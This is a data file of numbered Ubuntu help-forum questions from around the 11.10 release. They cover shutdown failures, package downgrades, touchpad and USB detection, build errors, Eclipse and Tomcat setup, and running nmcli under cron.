107328	can not reboot or even shutdown my ubuntu	i use ubuntu 11.10 . i recently installed gnome shell . the problem i 'm facing is that i 'm not able to restart or shutdown from ubuntu . i clicked on restart or shutdown button and nothing happens . just nothing . i even try to login from my unity shell and still the problem persists . even more funny , when i boot into linux , and seeing the login screen , still even after clicking on shutdown , i wo n't happen . what mistake have i performed ? but i 'm able to perform reboot with the command '' sudo reboot '' . any assistance please . thanks in advance .
107335	downgrading vlc 2.0.1 -- > 1.1.12	vlc 2.0.1 is behaving oddly , and since it does not appear to offer any increase in performance over 1.1.12 i would like to downgrade to the latter . however , this appears to be non-trivial . after running these commands : sudo apt-get remove -- purge vlc sudo add-apt-repository -r ppa : videolan/stable-daily sudo apt-get update vlc 2.0.1 should be gone , as should the ppa from which i got it . however , it is still not possible to install vlc 1.1.12 . when i try to , i get an error message about broken dependencies : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 1.1.12-2~oneiric1 ) but 2.0.0+git20120222+r100-0~r29~oneiric1 is to be installed depends : libvlccore4 ( > = 1.1.0 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 1.1.12-2~oneiric1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 1.1.12-2~oneiric1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i reinstall vlc 1.1.12 ?
107345	if i modify a note locally in tomboy , can i upload those changes into the notes in ubuntuone ?	when i try to upload a new notes or changes using the synch function of tomboy , i only get the option to rename local notes or to replace them , but no to replace those notes on the cloud . is this supposed to be like this ? is it there a fix ? running tomboy 1.8.0 . ubuntu v11.10 up-to-date .
107353	excess power consumption in dell laptop	i have bought a new dell laptop , with 6 gb ram , running 64 bit ubuntu 11.10 . i have both windows on one partition and ubuntu on another partition . when i use windows , battery lasts for more than 2 hrs but when i use ubuntu , battery lasts only for a maximum of 1.5 hrs . i have installed powertop and it reported a whooping 32 watts . initially the complete list in the tunables column reported bad . even when the toggled the complete list to good , it just reports 31 watts again . what can i do to get my power consumption below 10 watts ? please help !
107354	touchpad wo n't work/not recognized on laptop , ubuntu 11.10	when i start out running 11.10 ( ocelot ) from the live cd the touchpad works with no problem . once installing however the touchpad does not work at all . i have installed all updates available . i have tried installing the synaptiks touchpad package and the gpointer package from the software manager , this did not help . under system settings - > mouse and touchpad there is only a mouse tab , no touchpad tab . it seems my touchpad is not even recognized . i have tried running several things in the terminal that i have found under similar questions , but i always get errors about the files not being found , or the drivers not being found . have tried : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps this results in an error message . dconf-editor can load the gui , but after that i ca n't seem to navigate through it to find the files that need editing . read what 's listed here . but i 've got no grub , running only ubuntu . as you can see i 've been trying several things and nothing has worked so far , would appreciate any help . thanks !
107362	how to solve huge number of errors on running ./configure on xvidcap downloaded from sourceforge ?	i downloaded `` xvidcap '' from sourceforge . when i run `` ./configure '' , i get a huge number of errors and warnings . how do i solve them ? here is what happens : usr @ u : ~/desktop/xvidcap-1.1.7 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for xml : :parser ... ok checking for library containing strerror ... none required checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for ranlib ... ranlib checking for gawk ... ( cached ) mawk checking for a sed that does not truncate output ... /bin/sed checking for bc ... /usr/bin/bc checking for x ... libraries , headers checking for gethostbyname ... yes checking for connect ... yes checking for remove ... yes checking for shmat ... yes checking for iceconnectionnumber in -lice ... yes checking for scrollkeeper-config ... /usr/bin/scrollkeeper-config checking for docbook2x-man ... no configure : could n't find docbook2x-man to generate current man pages . will try db2x_docbook2man . checking for db2x_docbook2man ... no configure : could n't find neither docbook2x-man nor db2x_docbook2man to generate current man pages . will install pre-generated ones if present . checking for xml2po ... no configure : could n't find xml2po to translate current man pages . will install pre-generated ones if present . checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking locale.h usability ... yes checking locale.h presence ... yes checking for locale.h ... yes checking for lc_messages ... yes checking libintl.h usability ... yes checking libintl.h presence ... yes checking for libintl.h ... yes checking for ngettext in libc ... yes checking for dgettext in libc ... yes checking for bind_textdomain_codeset ... yes checking for msgfmt ... ( cached ) /usr/bin/msgfmt checking for dcgettext ... yes checking if msgfmt accepts -c ... yes checking for gmsgfmt ... /usr/bin/msgfmt checking for xgettext ... ( cached ) /usr/bin/xgettext checking for catalogs to be installed ... de en it es checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for package ... yes checking for xmuclientwindow in -lxmu ... yes checking for xfixesgetcursorimage in -lxfixes ... yes checking for xdamagesubtract in -lxdamage ... yes checking for pow in -lm ... yes checking for lame_init in -lmp3lame ... no to use mp3 audio codecs you need liblame/liblame-dev checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for the pthreads library -lpthreads ... no checking whether pthreads work without any flags ... no checking whether pthreads work with -kthread ... no checking whether pthreads work with -kthread ... no checking for the pthreads library -llthread ... no checking whether pthreads work with -pthread ... yes checking for joinable pthread attribute ... pthread_create_joinable checking if more special flags are required for pthreads ... no make-ing prerequisite ffmpeg libraries install prefix /usr/local source path /home/usr/desktop/xvidcap-1.1.7/ffmpeg c compiler gcc .align is power-of-two no arch x86_64 ( generic ) big-endian no mmx enabled yes cmov enabled no cmov is fast no ebx available yes ebp available yes gprof enabled no debug symbols yes strip symbols yes optimizations yes static yes shared no postprocessing support no software scaler enabled yes new filter support no filters using lavformat no video hooking yes imlib2 support no freetype support yes network support yes ipv6 support yes threading support pthreads sdl support no sun medialib support no avisynth enabled no liba52 support no liba52 dlopened no libamr-nb support no libamr-wb support no libdc1394 support no libfaac enabled no libfaad enabled no libfaad dlopened no libgsm enabled no libmp3lame enabled no libnut enabled no libtheora enabled no libvorbis enabled no x264 enabled no xvid enabled no zlib enabled yes enabled decoders : aasc fourxm qdm2 ac3 fraps qdraw adpcm_4xm gif qpeg adpcm_adx h261 qtrle adpcm_ct h263 ra_144 adpcm_ea h263i ra_288 adpcm_ea_maxis_xa h264 rawvideo adpcm_ea_r1 huffyuv rl2 adpcm_ea_r2 idcin roq adpcm_ea_r3 imc roq_dpcm adpcm_ea_xas indeo2 rpza adpcm_g726 indeo3 rv10 adpcm_ima_amv interplay_dpcm rv20 adpcm_ima_dk3 interplay_video sgi adpcm_ima_dk4 jpegls shorten adpcm_ima_ea_eacs kmvc smackaud adpcm_ima_ea_sead loco smacker adpcm_ima_qt mace3 smc adpcm_ima_smjpeg mace6 snow adpcm_ima_wav mdec sol_dpcm adpcm_ima_ws mimic sonic adpcm_ms mjpeg sp5x adpcm_sbpro_2 mjpegb sunrast adpcm_sbpro_3 mmvideo svq1 adpcm_sbpro_4 mp2 svq3 adpcm_swf mp3 targa adpcm_thp mp3adu theora adpcm_xa mp3on4 thp adpcm_yamaha mpc7 tiertexseqvideo alac mpc8 tiff amv mpeg1video truemotion1 ape mpeg2video truemotion2 asv1 mpeg4 truespeech asv2 mpegvideo tscc atrac3 msmpeg4v1 tta avs msmpeg4v2 txd bethsoftvid msmpeg4v3 ulti bfi msrle vb bmp msvideo1 vc1 c93 mszh vcr1 cavs nellymoser vmdaudio cinepak nuv vmdvideo cljr pcm_alaw vmnc cook pcm_mulaw vorbis cscd pcm_s16be vp3 cyuv pcm_s16le vp5 dca pcm_s16le_planar vp6 dnxhd pcm_s24be vp6a dsicinaudio pcm_s24daud vp6f dsicinvideo pcm_s24le vqa dvbsub pcm_s32be wavpack dvdsub pcm_s32le wmav1 dvvideo pcm_s8 wmav2 dxa pcm_u16be wmv1 eightbps pcm_u16le wmv2 eightsvx_exp pcm_u24be wmv3 eightsvx_fib pcm_u24le wnv1 escape124 pcm_u32be ws_snd1 ffv1 pcm_u32le xan_dpcm ffvhuff pcm_u8 xan_wc3 flac pcm_zork xl flashsv pcx xsub flic png zlib flv ptx zmbv enabled encoders : ac3 mjpeg pcm_u8 adpcm_adx mp2 pcm_zork adpcm_g726 mpeg1video pgm adpcm_ima_qt mpeg2video pgmyuv adpcm_ima_wav mpeg4 png adpcm_ms msmpeg4v1 ppm adpcm_swf msmpeg4v2 qtrle adpcm_yamaha msmpeg4v3 rawvideo asv1 pam roq asv2 pbm roq_dpcm bmp pcm_alaw rv10 dnxhd pcm_mulaw rv20 dvbsub pcm_s16be sgi dvdsub pcm_s16le snow dvvideo pcm_s24be sonic ffv1 pcm_s24daud sonic_ls ffvhuff pcm_s24le svq1 flac pcm_s32be targa flashsv pcm_s32le tiff flv pcm_s8 vorbis gif pcm_u16be wmav1 h261 pcm_u16le wmav2 h263 pcm_u24be wmv1 h263p pcm_u24le wmv2 huffyuv pcm_u32be zlib jpegls pcm_u32le zmbv ljpeg enabled parsers : aac h261 mpeg4video ac3 h263 mpegaudio cavsvideo h264 mpegvideo dca mjpeg pnm dvbsub mlp vc1 dvdsub enabled demuxers : aac image2 pcm_u8 ac3 image2pipe pva aiff ingenient rawvideo amr ipmovie redir apc lmlm4 rl2 ape m4v rm asf matroska roq au mjpeg rpl avi mm rtsp avs mmf sdp bethsoftvid mov segafilm bfi mp3 shorten c93 mpc siff daud mpc8 smacker dsicin mpegps sol dts mpegts str dv mpegtsraw swf dxa mpegvideo thp ea msnwc_tcp tiertexseq ea_cdata mtv tta ffm mxf txd flac nsv vc1 flic nut vc1t flv nuv vmd fourxm ogg voc gif pcm_alaw wav gsm pcm_mulaw wc3 gxf pcm_s16be wsaud h261 pcm_s16le wsvqa h263 pcm_s8 wv h264 pcm_u16be xa idcin pcm_u16le yuv4mpegpipe iff enabled muxers : ac3 image2pipe nut adts ipod ogg aiff m4v pcm_alaw amr matroska pcm_mulaw asf matroska_audio pcm_s16be asf_stream mjpeg pcm_s16le au mmf pcm_s8 avi mov pcm_u16be avm2 mp2 pcm_u16le crc mp3 pcm_u8 dts mp4 psp dv mpeg1system rawvideo ffm mpeg1vcd rm flac mpeg1video roq flv mpeg2dvd rtp framecrc mpeg2svcd swf gif mpeg2video tg2 gxf mpeg2vob tgp h261 mpegts voc h263 mpjpeg wav h264 null yuv4mpegpipe image2 enabled protocols : file pipe tcp http rtp udp enabled filters : crop enabled bsfs : dump_extradata mov2textsub noise h264_mp4toannexb mp3_header_compress remove_extradata imx_dump_header mp3_header_decompress text2movsub mjpega_dump_header enabled indevs : dv1394 oss v4l2 enabled outdevs : oss license : gpl creating config.mak and config.h ... config.h is unchanged gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mjpegenc.o libavcodec/mjpegenc.c in file included from libavcodec/mpegvideo.h:32:0 , from libavcodec/mjpegenc.c:38 : libavcodec/bitstream.h : in function 'skip_bits ' : libavcodec/bitstream.h:680:1 : warning : variable 're_cache ' set but not used [ -wunused-but-set-variable ] gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/loco.o libavcodec/loco.c in file included from libavcodec/loco.c:28:0 : libavcodec/bitstream.h : in function 'skip_bits ' : libavcodec/bitstream.h:680:1 : warning : variable 're_cache ' set but not used [ -wunused-but-set-variable ] gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mace.o libavcodec/mace.c gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mimic.o libavcodec/mimic.c in file included from libavcodec/mimic.c:27:0 : libavcodec/bitstream.h : in function 'skip_bits ' : libavcodec/bitstream.h:680:1 : warning : variable 're_cache ' set but not used [ -wunused-but-set-variable ] gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mjpegbdec.o libavcodec/mjpegbdec.c in file included from libavcodec/mjpeg.h:37:0 , from libavcodec/mjpegbdec.c:28 : libavcodec/bitstream.h : in function 'skip_bits ' : libavcodec/bitstream.h:680:1 : warning : variable 're_cache ' set but not used [ -wunused-but-set-variable ] gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mmvideo.o libavcodec/mmvideo.c libavcodec/mmvideo.c : in function 'mm_decode_frame ' : libavcodec/mmvideo.c:156:5 : warning : 'avpalettecontrol ' is deprecated ( declared at libavcodec/avcodec.h:2266 ) [ -wdeprecated-declarations ] gcc -dhave_av_config_h -d_file_offset_bits=64 -d_largefile_source -d_isoc9x_source -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavcodec -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavdevice -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavfilter -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavformat -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libavutil -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libpostproc -i '' /home/usr/desktop/xvidcap-1.1.7/ffmpeg '' /libswscale -fomit-frame-pointer -pthread -g -wdeclaration-after-statement -wall -wno-switch -wdisabled-optimization -wpointer-arith -wredundant-decls -wno-pointer-sign -wcast-qual -wwrite-strings -wtype-limits -o3 -fno-math-errno -fno-signed-zeros -c -o libavcodec/mpegaudiodec.o libavcodec/mpegaudiodec.c in file included from libavcodec/mpegaudiodec.c:29:0 : libavcodec/bitstream.h : in function 'skip_bits ' : libavcodec/bitstream.h:680:1 : warning : variable 're_cache ' set but not used [ -wunused-but-set-variable ] libavcodec/mpegaudiodec.c : in function 'decode_init ' : libavcodec/mpegaudiodec.c:357:26 : warning : variable 'n ' set but not used [ -wunused-but-set-variable ] libavcodec/mpegaudiodec.c : in function 'mp_decode_layer3 ' : libavcodec/mpegaudiodec.c:2008:39 : warning : variable 'private_bits ' set but not used [ -wunused-but-set-variable ] ^cmake : *** [ libavcodec/mpegaudiodec.o ] interrupt usr @ u : ~/desktop/xvidcap-1.1.7 $ here is the output for lsb_release -a $ lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric here is the output for uname -v : usr @ u : ~ $ uname -v # 28-ubuntu smp fri jan 27 17:44:39 utc 2012
107364	is there any office suite or application that can read amipro .sam files	is there any program that supports reading amipro .sam files . i have giving up hope about libreoffice since i am still waiting for an email answer about it . but while i wait maybe somebody knows of another program that reads .sam files . in this case amipro 3.0
107366	how do i show the paths of a package in aptitude ?	i know how to show the paths where i installed a package with dpkg : $ dpkg -l gnome how can i do that with aptitude ?
107374	how to list all setuid binaries in the ubuntu repository ?	is there any way i can list all setuid binaries inside the ubuntu respository ? or does such a list exist somewhere on the web ? i have looked at the apt-get options and could not come up with a solution for the same . i 'm assuming that there must be a list for the same though .
107378	after 11.10 installation , only background appears	i just made a clean installation of 11.10 , and after reboot only the background screen is shown . to mouse pointer is also shown and can be moved . what should i do now ? i previously tried with 11.10 on windows but a lot of different errors occured - so i tried with a total clean installation on : intel cpu 2gb of ram 40gb pata hd
107379	installing eclipse by apt-get	my favorable method for installing is always apt-get . fortunately , eclipse is now included in apt-get repository . however , when i installed it with apt-get , it works fine for programming languages such as c/c++ ; but when i try to install android developer sdk , it gives an error for missing org.eclipse.ui . i found several questions about this error , but no solution for apt-get install . the only solution is to install classic eclipse from source . i believe there should be a solution to install org.eclipse.ui with apt-get install .
107389	eclipse does n't work correctly when not run as super user	i downloaded eclipse from eclipse page and extracted it in downloads directory . when i run eclipse as normal user then application behaves strange : $ ./eclipse gtk-message : failed to load module `` canberra-gtk-module '' some symptoms : eclipse ca n't resolve symbols in source code and marks them as invalid gui looks like in other kde applications when i quit program , then there is some error about write protection error message : problems occurred while trying to save the state of the workbench . could not write metadata for '/ab ' . /home/user/workspace/.metadata/.plugins/org.eclipse.core.resources/.projects/ab/.markers ( permission denied ) i encountered some other problems like write problems during update . however when i run eclipse as super user : $ sudo ./eclipse then everything works as it should and gui looks different ( gtk is loaded or what ? i do n't know ) . i tried to give 777 permission to all files in eclipse directory but it did n't work . and i did n't install eclipse anywhere , just downloaded and extracted . i tried also to download eclipse with apt-get but there was the same problem . how to make eclipse work correct ? i use kubuntu 11.10 .
107391	can i have 10.10 with a 3.x kernel ?	i would like to know if i can run ubuntu maverick meerkat 10.10 version with the new kernel ver . 3.x . i 'm asking because my the 10.10 dvd installer seems to have problems detecting hardware in my new asus motherboard ; the 11.04 dvd installer runs ok . personally , i do not like the unity interface , and do not want to be forced to use later versions than 10.10 . your help is very much appreciated .
107394	xubuntu 11.10 slowdown/lag , restarting x does n't help	every once in a while , typically after my computer has been idle for at least 30 minutes or so , my machine becomes unusably slow . it 's hard to describe exactly what 's happening -- it 's a lag , basically . mouse movement drags far behind what it should be , clicks take up to 30 seconds to process , applications take a very long time to launch ( even from the console ) . i 've checked htop and the system monitor and cpu/mem usage is normal . no processes appear to be eating cycles or doing anything out of the ordinary . restarting x has no effect , and even the terminals are significantly slowed . i 've tried killing processes like crazy , including various daemons and xscreensaver , but the only thing that fixes the problem is restarting the machine entirely . i ca n't find anything out of ordinary in the logs , dmesg , or anywhere else . i 've turned off power management , to no effect . i was previously running ubuntu 10.04 on this machine and never experienced the issue . i also have debian testing running ( also with xfce ) , and do n't experience the issue . i have an nvidia card , and am using the recommended nvidia-current drivers , if that might be relevant . does anyone have any idea ? i am utterly stumped here , and i 'm loving xubuntu otherwise . thanks !
107400	tomcat manager application and http 404 error	i am trying to set up the admin application for a tomcat 6.0.24 instance . none of the searches i 've done turn up anything i can use . i am using this configuration for apache 2.2.14 : alias /manager /usr/share/tomcat6-admin/manager < directory `` /usr/share/tomcat6-admin/manager '' > options indexes followsymlinks allowoverride none allow from all < /directory > proxypass /manager ajp : //localhost:8009/manager in the tomcat-users.xml i have this : < tomcat-users > < role rolename= '' tomcat '' / > < role rolename= '' admin '' / > < role rolename= '' operator '' / > < role rolename= '' manager '' / > < user username= '' admin '' password= '' nopasswordforyou '' roles= '' admin , tomcat , manager '' / > < user username= '' operator '' password= '' nevermind '' roles= '' operator '' / > < /tomcat-users > i found the docs that suggested i needed manager-gui role installed and defined , but that appears to be tomcat 7 , not tomcat 6 . the manager.xml is the default provided with ubuntu lucid lynx 10.04 : < context path= '' /manager '' docbase= '' /usr/share/tomcat6-admin/manager '' antiresourcelocking= '' false '' privileged= '' true '' / > if i access /manager from a web browser , i get a 404 error from tomcat : `` requested resource not available . '' if i access /manager/images i get the same thing . if i access /manager/401.jsp i get the actual page . in addition , the server.xml has not only the usual realm ( userdatabaserealm ) but also one for mysql authentication ( jdbcrealm ) . investigating this showed that the role of manager was not present there for the user admin ; i fixed that by doing : insert user_role_db set user_name='admin ' , role_name='manager ' ; i restarted tomcat , although i suspect that was overkill . no change . i do n't see any errors in catalina.out or in localhost . * log files . what am i missing ? what is the interaction between the different realms ? how do i get the manager application working ?
107401	nmcli works in script when i run itdirectly , but not when run in cron	this is under ubuntu 11.10 i have a script that starts a pptp vpn connection fetches a couple of files , then closes the connection . when i run this script from a terminal prompt it works perfectly ; however , when i schedule it to run with cron the nmcli commands in the script generate errors . the vpn connections are configured to be used by any user , not just my account . here is the relevant line of the script : /usr/bin/nmcli con up id myvpn and here is the errors that generate when using it in cron : ** ( process:6360 ) : warning ** : _nm_object_get_property : error getting 'wirelesshardwareenabled ' for /org/freedesktop/networkmanager : ( 9 ) rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.624 '' ( uid=1000 pid=6360 comm= '' /usr/bin/nmcli con up id myvpn `` ) interface= '' org.freedesktop.dbus.properties '' member= '' get '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1029 comm= '' networkmanager `` ) ** ( process:6360 ) : warning ** : _nm_object_get_property : error getting 'wwanhardwareenabled ' for /org/freedesktop/networkmanager : ( 9 ) rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.624 '' ( uid=1000 pid=6360 comm= '' /usr/bin/nmcli con up id myvpn `` ) interface= '' org.freedesktop.dbus.properties '' member= '' get '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1029 comm= '' networkmanager `` ) ** ( process:6360 ) : warning ** : _nm_object_get_property : error getting 'wimaxhardwareenabled ' for /org/freedesktop/networkmanager : ( 9 ) rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.624 '' ( uid=1000 pid=6360 comm= '' /usr/bin/nmcli con up id myvpn `` ) interface= '' org.freedesktop.dbus.properties '' member= '' get '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1029 comm= '' networkmanager `` ) ** ( process:6360 ) : warning ** : _nm_object_get_property : error getting 'state ' for /org/freedesktop/networkmanager : ( 9 ) rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.624 '' ( uid=1000 pid=6360 comm= '' /usr/bin/nmcli con up id myvpn `` ) interface= '' org.freedesktop.dbus.properties '' member= '' get '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1029 comm= '' networkmanager `` ) any ideas would be appreciated !
107406	problem with usb devices	i have changed my os from windows xp to ubuntu and all usb devices ( usb hdd , flash disk , usb webcam and others ) are not noticed . all these devices were fully functional on my computer when i had windows xp . can you help me please ?
107410	can you unencrypt / remove encryption from a user home folder ?	during installation i have chosen to encrypt my user 's home folder . can i un-encrypt it ? how would i do that ? i just want it to be `` normal '' again .
107411	lubuntu 11.10 wo n't let me change desktop to lxde . auto login , so no login screen	i have an older pc , switched to ubuntu 11.10 , love it but with a little research decided to switch to lubuntu for better performance . ca n't load the lxde desktop per forum instructions because i enabled autologin at install .
